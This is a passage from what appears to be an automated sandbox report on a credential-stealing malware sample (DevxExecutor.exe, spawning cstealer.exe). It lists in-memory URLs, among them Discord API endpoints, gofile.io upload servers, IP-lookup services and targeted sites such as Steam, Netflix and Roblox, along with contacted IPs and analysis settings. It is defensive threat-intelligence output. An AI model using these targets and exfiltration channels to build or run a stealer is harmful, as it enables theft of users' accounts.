                                                                                      https://foss.heptapod.net/pypy/pypy/-/issues/3539cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.cstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2520480838.00000271DA138000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455429360.00000271DA12B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179233556.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288437709.0000020102E0B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://steam.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        http://google.com/cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537885870.00000271DA18C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2537371997.00000271DA185000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177398207.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290930130.0000020102DFF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://mahler:8092/site-updates.pycstealer.exe, 00000003.00000002.2685159509.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552853520.00000271D9E61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496638039.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2526154847.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2465182617.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475893944.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2626607283.00000271D9E63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2437236490.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278585948.0000020102D69000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288716798.0000020102D73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219297848.0000020103202000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		low
                                                                                          https://api.gofile.io/getServerrcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://.../back.jpegcstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            https://netflix.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		low
                                                                                            https://www.python.org/download/releases/2.3/mro/.cstealer.exe, 00000003.00000003.2170388540.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2607686027.00000271D9960000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170218167.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2195916443.00000170DBC4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB7C4000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197454135.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197231319.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2312005258.00000201025C0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197406606.0000020102A6B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197166727.0000020102A6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://httpbin.org/postcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2647937867.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2544001972.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553966495.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215216888.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212971646.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214455444.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221596067.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217913546.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280237050.0000020102AC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://api.ipify.orgrcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://discord.gg/cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://discordapp.com/api/v6/users/cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsNcstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://github.com/Ousret/charset_normalizercstealer.exe, 00000003.00000003.2455332650.00000271D9E2D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2542350232.00000271D9E45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2470513280.00000271D9E3D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2625581218.00000271D9E5B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552117911.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2222114671.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286219143.000002010319B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281510656.000002010319A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103182000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273515277.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 0000002F.00000003.2441436084.000001CBB7EBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://minecraft.net)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://yahoo.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://netflix.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		low
                                                                                                      https://github.com/urllib3/urllib3/issues/2920cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2342208883.0000020102F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://gmail.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		low
                                                                                                        https://yahoo.com/cstealer.exe, 00000003.00000003.2475616285.00000271DA3F9000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475194270.00000271DA3F4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552638116.00000271DA40A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2545364608.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2682591127.00000271DA401000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2523478749.00000271DA3FD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2509975417.00000271DA3FC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219080710.00000201030AC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2284408959.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102E12000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2286124476.0000020102E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276614060.0000020103094000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339153466.0000020102E1D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276235445.000002010308A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2351020325.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290986638.00000201030B8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://origin.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		low
                                                                                                          https://pornhub.comcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://roblox.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		low
                                                                                                            https://outlook.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		low
                                                                                                            https://api.ipify.orgcstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              208.95.112.1
                                                                                                              		ip-api.comUnited States
                                                                                                              		53334TUT-ASUSfalse
                                                                                                              149.154.167.220
                                                                                                              		api.telegram.orgUnited Kingdom
                                                                                                              		62041TELEGRAMRUfalse
                                                                                                              162.159.138.232
                                                                                                              		discord.comUnited States
                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                              185.199.108.133
                                                                                                              		raw.githubusercontent.comNetherlands
                                                                                                              		54113FASTLYUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                                                                              Analysis ID:1439028
                                                                                                              Start date and time:2024-05-09 17:46:08 +02:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 13m 1s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:159
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:DevxExecutor.exe
                                                                                                              Detection:MAL
                                                                                                              Classification:mal100.rans.troj.spyw.evad.winEXE@191/263@5/4
                                                                                                              EGA Information:
                                                                                                              • Successful, ratio: 85.7%
                                                                                                              HCA Information:Failed
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .exe

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 142.250.189.3
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target DevxExecutor.exe, PID 320 because it is empty
                                                                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
